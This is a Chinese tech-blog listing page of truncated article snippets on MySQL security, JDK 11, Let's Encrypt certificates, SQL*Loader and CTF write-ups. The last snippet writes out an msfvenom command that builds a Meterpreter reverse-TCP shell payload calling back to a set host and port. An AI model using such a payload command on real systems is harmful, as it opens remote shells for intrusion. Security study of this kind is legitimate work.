数据库的安全性是指保护数据库以防止不合法的使用而造成数据泄露,更改或破坏,所以安全性对于任何一个DBMS来说都是至关重要的. 身份验证,数据库用户权限确认 用户账号管理 root用户 mysql-> select user from mysql.user; 使用create user语句创建MySQ ...
分类:
其他好文 时间:
2020-07-30 21:48:39
阅读次数:
94
最近刚好有一点时间,看到java都快更新到14了。不过主流的稳定版本还是java11,因此还是用java11来做一个简单的开箱测试吧。首先是下载,以下是下载路径,我选择的是zip文件。jdk11的下载路径:https://www.oracle.com/java/technologies/javase ...
分类:
编程语言 时间:
2020-07-30 14:21:51
阅读次数:
62
Let's Encrypt是一个证书颁发机构(CA),它提供了免费TLS / SSL证书,从而可以在Web服务器上启用加密的HTTPS。 使用“让我们加密SSL”证书的主要优点: 它是免费的 -拥有域的任何人都可以以零成本获得该域的受信任证书。 它是自动的 –证书的整个注册过程会在服务器的本机安装或 ...
分类:
其他好文 时间:
2020-07-28 22:12:50
阅读次数:
85
restart.cpp定义了internal类型的几个成员函数: bool Internal::stabilizing () bool Internal::restarting () int Internal::reuse_trail () void Internal::restart () 1 # ...
分类:
其他好文 时间:
2020-07-26 19:04:51
阅读次数:
64
1.关于let's encrypt和acme.sh的简介 1.1 let's encrypt Let's Encrypt是一个于2015年三季度推出的数字证书认证机构,旨在以自动化流程消除手动创建和安装证书的复杂流程,并推广使万维网服务器的加密连接无所不在,为安全网站提供免费的SSL/TLS证书。 ...
分类:
Web程序 时间:
2020-07-24 13:26:37
阅读次数:
285
options (rows=10000,direct=true,skip=0,errors=10000)load datainfile '文件名'truncate into table 表名fields terminated by ','optionally enclosed by '"'trail ...
分类:
数据库 时间:
2020-07-21 21:51:23
阅读次数:
75
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: f ...
分类:
其他好文 时间:
2020-07-18 22:51:32
阅读次数:
121
0x01 进入页面如下 提示我们寻找secret,再加上题目的提示,猜测这里有secret页面,我们尝试访问,结果如下 根据它这个话的意思,是让我们传参,然后它会给你加密,我们试一下 发现输入的1变成了d,我们尝试增加输入参数的长度,然后就出现了下图的结果 报错了,直接源码泄露,然后我们看一下标记处 ...
分类:
其他好文 时间:
2020-07-18 15:52:28
阅读次数:
82
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
